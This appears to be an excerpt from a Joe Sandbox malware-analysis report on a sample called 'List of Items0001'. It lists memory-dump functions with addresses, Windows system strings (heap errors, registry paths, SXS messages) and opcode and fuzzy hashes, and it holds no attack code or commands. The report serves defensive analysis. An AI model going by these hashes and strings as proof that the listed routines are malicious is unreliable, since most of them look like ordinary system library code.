                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: FilterFullPath$UseFilter$\??\
                                                • API String ID: 0-2779062949
                                                • Opcode ID: 6cf78177165e98b627cf0e029052f562cc12842bd965b15694048ce6e8bba4cb
                                                • Instruction ID: 668d7e7002247c56c404b2c7cbbd852790776f542311d57bf0ae96a5d4f5d80c
                                                • Opcode Fuzzy Hash: 6cf78177165e98b627cf0e029052f562cc12842bd965b15694048ce6e8bba4cb
                                                • Instruction Fuzzy Hash: 8BA179759012699FDF219B24CC88BDAB3B8EF44714F1001EAE909A7250EB759F84CF55
                                                Function 3273B2BC Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                Download Yara Rule
                                                Strings
                                                • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 3273B3AA
                                                • GlobalizationUserSettings, xrefs: 3273B3B4
                                                • TargetNtPath, xrefs: 3273B3AF
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                • API String ID: 0-505981995
                                                • Opcode ID: 60a23296373fad9e1459e945f1a8ba16ded389b7170609df44d9d29444cd0f2f
                                                • Instruction ID: 4859d23a9d66ff93d4796449065eaa87df1315ba0b0a4cb281b51ad6c71106ef
                                                • Opcode Fuzzy Hash: 60a23296373fad9e1459e945f1a8ba16ded389b7170609df44d9d29444cd0f2f
                                                • Instruction Fuzzy Hash: E1617D72942228ABDB229B54DC9CBD9B7B8FF14714F4101E5EA08AB251CB749E84CF94
                                                Function 3265F75B Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                Download Yara Rule
                                                Strings
                                                • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 326BE455
                                                • HEAP[%wZ]: , xrefs: 326BE435
                                                • HEAP: , xrefs: 326BE442
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                • API String ID: 0-1340214556
                                                • Opcode ID: 0df8f35463409436b6889464c48340fd4cd041700603c2594ad8aac133e4725f
                                                • Instruction ID: fa9cf9de8d522aa5edcf1acaae7959c4cd6c0fa5fe038e08f2cfe2f9af08e716
                                                • Opcode Fuzzy Hash: 0df8f35463409436b6889464c48340fd4cd041700603c2594ad8aac133e4725f
                                                • Instruction Fuzzy Hash: 7B510635604784EFE71ACBA8C884F9ABBFCFF05344F2444A5E5508B692DB78E941CB52
                                                Function 3270D62C Relevance: 3.9, Strings: 3, Instructions: 163COMMON
                                                Download Yara Rule
                                                Strings
                                                • HEAP[%wZ]: , xrefs: 3270D792
                                                • Heap block at %p modified at %p past requested size of %Ix, xrefs: 3270D7B2
                                                • HEAP: , xrefs: 3270D79F
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                • API String ID: 0-3815128232
                                                • Opcode ID: 8f7c73d7465085f334257e43f58949116b0f0b62f6013eec26c93b499e5ba018
                                                • Instruction ID: 292d7ec30cf5b9a75db320f82e23d1c3a220fcf7db2e38d3761e857f48c8725e
                                                • Opcode Fuzzy Hash: 8f7c73d7465085f334257e43f58949116b0f0b62f6013eec26c93b499e5ba018
                                                • Instruction Fuzzy Hash: A451D2791003518AF365CA2ACC44772B7E2FF45388F91C88DE4C58F685EA76E84ADF61
                                                Function 3266A1E3 Relevance: 3.9, Strings: 3, Instructions: 118COMMON
                                                Download Yara Rule
                                                Strings
                                                • RtlpResUltimateFallbackInfo Exit, xrefs: 3266A229
                                                • @Sc2, xrefs: 3266A268
                                                • RtlpResUltimateFallbackInfo Enter, xrefs: 3266A21B
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @Sc2$RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                • API String ID: 0-1512289293
                                                • Opcode ID: 61b8654792ccfe13241c24b903f97f54f84b2f597fe4ad51b114274cd909e03e
                                                • Instruction ID: 215cf42f2b265293557340fd73f2d4a9d57854deb99733297ee4703ae6980f8f
                                                • Opcode Fuzzy Hash: 61b8654792ccfe13241c24b903f97f54f84b2f597fe4ad51b114274cd909e03e
                                                • Instruction Fuzzy Hash: F241CF74740744DBEB09DF5AC880B6AB7B8FF86748F2440A5EC05DB2A0EA76DD40CB52
                                                Function 326EB214 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                                Download Yara Rule
                                                Strings
                                                • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 326EB2B2
                                                • @, xrefs: 326EB2F0
                                                • GlobalFlag, xrefs: 326EB30F
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                • API String ID: 0-4192008846
                                                • Opcode ID: 531f6365e8d741a777957b62cbe7408ed50048707834c88d6ecb0f83cecacde3
                                                • Instruction ID: 534b5d8aee7e793572204b7b315b0a3a4c9ff3e84f583e2a9d8b114229fe19ee
                                                • Opcode Fuzzy Hash: 531f6365e8d741a777957b62cbe7408ed50048707834c88d6ecb0f83cecacde3
                                                • Instruction Fuzzy Hash: 5B315CB1E02219AFDB00DF94DD91AEEBBBCFF44748F5404A9E602A7140DB749E048B94
                                                Function 326751C0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$@
                                                • API String ID: 0-149943524
                                                • Opcode ID: 01780da138b0cb95602f12265da5f68e2f784aefafdcb3a1870dc51bd8a9c5e7
                                                • Instruction ID: 5b8dc7deb2d3bf3a86439cc928dd509c156c733f8f09a348b8033b817b7dacad
                                                • Opcode Fuzzy Hash: 01780da138b0cb95602f12265da5f68e2f784aefafdcb3a1870dc51bd8a9c5e7
                                                • Instruction Fuzzy Hash: DA32BEB45083518BE724CF18D4A0B2EB7E1EF88748F50496EFD9587290EB74D884CB97
                                                Function 32665622 Relevance: 3.1, APIs: 2, Instructions: 104timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                • API String ID: 3446177414-0
                                                • Opcode ID: c60e6109acc324a23506f0f875ea3d6874cbeae0fe630e7d6246561e237372bc
                                                • Instruction ID: 8407acdae4dcda4c1151bea6d41fb194047cd0be538c3f8123f0bd3aff231140
                                                • Opcode Fuzzy Hash: c60e6109acc324a23506f0f875ea3d6874cbeae0fe630e7d6246561e237372bc
                                                • Instruction Fuzzy Hash: 1631C131201B22EFE74AAF65CA50B9AFB65FF84758F104055E90187A60DBB0E831CBD5
                                                Function 326DE372 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID: Legacy$UEFI
                                                • API String ID: 2994545307-634100481
                                                • Opcode ID: b4cb3462dd0c0e1635a6af7372118df1dcecce13ed0fc53aa4a4eea994d82e82
                                                • Instruction ID: dc2d02059ad5d93642b27ca6e17cbcdc9a135a45e212d3463ab8ed51bd779466
                                                • Opcode Fuzzy Hash: b4cb3462dd0c0e1635a6af7372118df1dcecce13ed0fc53aa4a4eea994d82e82
                                                • Instruction Fuzzy Hash: E0615CB1A007099FEB15CFA8C950BADB7B9FF48744F50406EE549EB251EB31E940CBA4
                                                Function 3273B55F Relevance: 2.7, Strings: 2, Instructions: 168COMMON
                                                Download Yara Rule
                                                Strings
                                                • RedirectedKey, xrefs: 3273B60E
                                                • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 3273B5C4
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                • API String ID: 0-1388552009
                                                • Opcode ID: 143b781342d45fee02f80c4a95039a57581edb467a79cc7c114d59ca688f7384
                                                • Instruction ID: b00e4eeaab0b8171aae683098eb40fe72dae41ca87460472aa518b6379a3f714
                                                • Opcode Fuzzy Hash: 143b781342d45fee02f80c4a95039a57581edb467a79cc7c114d59ca688f7384
                                                • Instruction Fuzzy Hash: EC6128B5C02219EFDB12CF94C848ADEBBB9FF08704F50445AE904AB210DB359A85DF90
                                                Function 3267F640 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: $$$
                                                • API String ID: 3446177414-233714265
                                                • Opcode ID: 18d505c81c2526b6742d66d0f76c3c4486f4e89391bd3c8c73ba8b9b5bda8eb5
                                                • Instruction ID: 25c89165acf506cc09d961e5a6ac6bac2f2eaa180015c1dc29635457ce5f2ef5
                                                • Opcode Fuzzy Hash: 18d505c81c2526b6742d66d0f76c3c4486f4e89391bd3c8c73ba8b9b5bda8eb5
                                                • Instruction Fuzzy Hash: 346100B5A01749CFEB24CFA8E580FADB7F5FF44308F204469D5256B680CBB0A980CB95
                                                Function 326F314A Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                • API String ID: 0-118005554
                                                • Opcode ID: 4d6c459a7a760072969b9cfed4062ae9adf85ecf86bd2d3c8494b874dce5f98a
                                                • Instruction ID: 41d701ab686a0fa882658124f0dd7c1a8fee2cbd6f9426501ffb5060c57b43c4
                                                • Opcode Fuzzy Hash: 4d6c459a7a760072969b9cfed4062ae9adf85ecf86bd2d3c8494b874dce5f98a
                                                • Instruction Fuzzy Hash: C931ED752097C0ABE705CF68E990B2AB7E8EFC5754F000869F8548B390EB72D915CB57
                                                Function 326606CF Relevance: 2.6, Strings: 2, Instructions: 95COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: e2$ e2
                                                • API String ID: 0-779894419
                                                • Opcode ID: 7fc09fdba9d113c75318fd3f14cf2166ad91d0eeecce5f6f570122bbd5d8204d
                                                • Instruction ID: 6e43ecfe66106f31522896983463a350c8b6dadf204dee5548cccd27e0094c6b
                                                • Opcode Fuzzy Hash: 7fc09fdba9d113c75318fd3f14cf2166ad91d0eeecce5f6f570122bbd5d8204d
                                                • Instruction Fuzzy Hash: 8831A036604B41ABD715DE24C890AABBBA5FF846A8F114539FC5597210EF30DC05CFA6
                                                Function 326931BE Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: .Local\$@
                                                • API String ID: 0-380025441
                                                • Opcode ID: 794c0f5b393a4fe66243aa2ce21ea6395fd6d8988a37866483842b08b22234fd
                                                • Instruction ID: 35fa623a72333d2217aa540f8a4bb7541d8aa089c53177073d7a6694bb9d91ac
                                                • Opcode Fuzzy Hash: 794c0f5b393a4fe66243aa2ce21ea6395fd6d8988a37866483842b08b22234fd
                                                • Instruction Fuzzy Hash: 44316CB5549381AFD311DF28D880A9BBBE8EFC5754F00092EF99583250DA34DD18CB93
                                                Function 326933D0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                                Download Yara Rule
                                                Strings
                                                • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 326D289F
                                                • RtlpInitializeAssemblyStorageMap, xrefs: 326D289A
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                • API String ID: 0-2653619699
                                                • Opcode ID: 4221eb6c87e8b8d831e5baa996d21fa6bafb3061753f4fa6ee7ba89e49b5a1d7
                                                • Instruction ID: bd245f6ad14259390da42b653d9628582e731aa8f8e1a77ded03bb4f19124d1f
                                                • Opcode Fuzzy Hash: 4221eb6c87e8b8d831e5baa996d21fa6bafb3061753f4fa6ee7ba89e49b5a1d7
                                                • Instruction Fuzzy Hash: 5F1148B2B00308FBF7198A88CD40F9B77A9DFC5B54F118069B904EB245DEB4CD1487A5
                                                Function 3269A4F0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID: Cleanup Group$Threadpool!
                                                • API String ID: 2994545307-4008356553
                                                • Opcode ID: 137acaf8f34c5123f4ef69e98fe3838deb8c1e336373aaeb4879e9a3ce4de13f
                                                • Instruction ID: 550744973a9f351b3a5c76fea19da8ae1fe748d15dc7459d7975390db679723f
                                                • Opcode Fuzzy Hash: 137acaf8f34c5123f4ef69e98fe3838deb8c1e336373aaeb4879e9a3ce4de13f
                                                • Instruction Fuzzy Hash: D101DCB2651740AFE322DF24CD45B52B7E8EB4472AF008979E658C7AA0EB34D944CB46
                                                Function 326664F0 Relevance: 1.9, APIs: 1, Instructions: 383COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 57fef96aabc922a88f4b3773b99344fb08e5b4f6ecabec1494c9b5c235aeca95
                                                • Instruction ID: 8f177d70e6c20cd5e8844ef8d228bea0f843ed079a43024309d98fb93eceea0e
                                                • Opcode Fuzzy Hash: 57fef96aabc922a88f4b3773b99344fb08e5b4f6ecabec1494c9b5c235aeca95
                                                • Instruction Fuzzy Hash: D8E19D74609341CFD708CF28D090A6ABBE0FF88358F148A6DE99587351DB75E945CF92
                                                Function 3268B1E0 Relevance: 1.9, Strings: 1, Instructions: 629COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @[u2@[u2
                                                • API String ID: 0-2348913154
                                                • Opcode ID: 7b1e924e320313685f649f20d2cbd3b8ae1cdf1afcb27817ae82614810ead82f
                                                • Instruction ID: 5bc2a2a6dbe2afeeae85f536d417562ad2af4762ddacabe73369959b9476ea6e
                                                • Opcode Fuzzy Hash: 7b1e924e320313685f649f20d2cbd3b8ae1cdf1afcb27817ae82614810ead82f
                                                • Instruction Fuzzy Hash: 3932AFB5E00219DBDF18CFA8D890BAEBBB1FF84744F14016DE815AB390EB759941CB91
                                                Function 3266754C Relevance: 1.8, APIs: 1, Instructions: 277COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f333364007ac1b34541ae4a9b175081bc48fd8f8358d0c77e9f5e9be52ea04ee
                                                • Instruction ID: 45e5ea544361bd81b153063cde53da39ea454513b12411ecd20a99c58ddc48dc
                                                • Opcode Fuzzy Hash: f333364007ac1b34541ae4a9b175081bc48fd8f8358d0c77e9f5e9be52ea04ee
                                                • Instruction Fuzzy Hash: 08B15AB5A01202DFE70ACF68D480A69FBF5FF89348F2485AED419DB311DB70A941CB91
                                                Function 32661051 Relevance: 1.8, APIs: 1, Instructions: 259timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                • API String ID: 3446177414-0
                                                • Opcode ID: 0f82b34f24d4bd54bd4b3acae607d6222b113754fba47003d07870d6b618115f
                                                • Instruction ID: 7727a9b6a8e8a86b119fed3eb2da6a18c5f1784ed3d5faf3c800df6c34a528eb
                                                • Opcode Fuzzy Hash: 0f82b34f24d4bd54bd4b3acae607d6222b113754fba47003d07870d6b618115f
                                                • Instruction Fuzzy Hash: 6CB123B49093808FD754CF69C480A5AFBF1BF88708F14496EF89987362D771E885CB82
                                                Function 3266254C Relevance: 1.6, APIs: 1, Instructions: 119timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                • API String ID: 3446177414-0
                                                • Opcode ID: 87d132c75dc08d6d78151b1c5bc52b86884cbe74f502d2f6a5af2f6d9acfdc5c
                                                • Instruction ID: fb21ede0c5911c8a4880513eb864096df067f8c18fad8984a2a24e1c5356449c
                                                • Opcode Fuzzy Hash: 87d132c75dc08d6d78151b1c5bc52b86884cbe74f502d2f6a5af2f6d9acfdc5c
                                                • Instruction Fuzzy Hash: 0841D0B1901704CFD729CF25D950B69B7F1FF44358F2086AAD4079B2A0EB78A981CF42
                                                Function 32664779 Relevance: 1.6, APIs: 1, Instructions: 111timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                • API String ID: 3446177414-0
                                                • Opcode ID: 8b6d89e4704c851791a5cf082e1a48383e9929e3ebfa944f4f3c6e67bd16e33d
                                                • Instruction ID: cddac15132e9d1fbefb834c73247b8f47f005b69ad96c0b0dc04169bdea8ca60
                                                • Opcode Fuzzy Hash: 8b6d89e4704c851791a5cf082e1a48383e9929e3ebfa944f4f3c6e67bd16e33d
                                                • Instruction Fuzzy Hash: 3341D3746043818FD325CF28D894B3ABBEAFF81798F50452DE9418B2A1DB70D855CB92
                                                Function 3265B420 Relevance: 1.6, APIs: 1, Instructions: 100timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                • API String ID: 3446177414-0
                                                • Opcode ID: 9026376d7685322f396d3ae7c342ad1175e4f92036bd2446a9350c60be160645
                                                • Instruction ID: fbd85687c76401d12fe624f94b571a01b2f9d4fab8cc97c5617a3bc9225f3f93
                                                • Opcode Fuzzy Hash: 9026376d7685322f396d3ae7c342ad1175e4f92036bd2446a9350c60be160645
                                                • Instruction Fuzzy Hash: F33133725402089FC721CF28C880A5AB7A9FF94364F20426DED059F299CB31ED42CBD5
                                                Function 326656E0 Relevance: 1.6, APIs: 1, Instructions: 92timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                • API String ID: 3446177414-0
                                                • Opcode ID: 8c94846080a47aa10a5d9e47e42d40574ebfcbda1cf9e8630b5aa84bc20ca8aa
                                                • Instruction ID: 6a821fee8fd3345196fa4cba529a727070a3acf4e9486a63cef8079d7d33a567
                                                • Opcode Fuzzy Hash: 8c94846080a47aa10a5d9e47e42d40574ebfcbda1cf9e8630b5aa84bc20ca8aa
                                                • Instruction Fuzzy Hash: EA31AF39616A15FFE75AAF24DA90B59BBA5FF84344F505055EC008BB51CB71E830CBC1
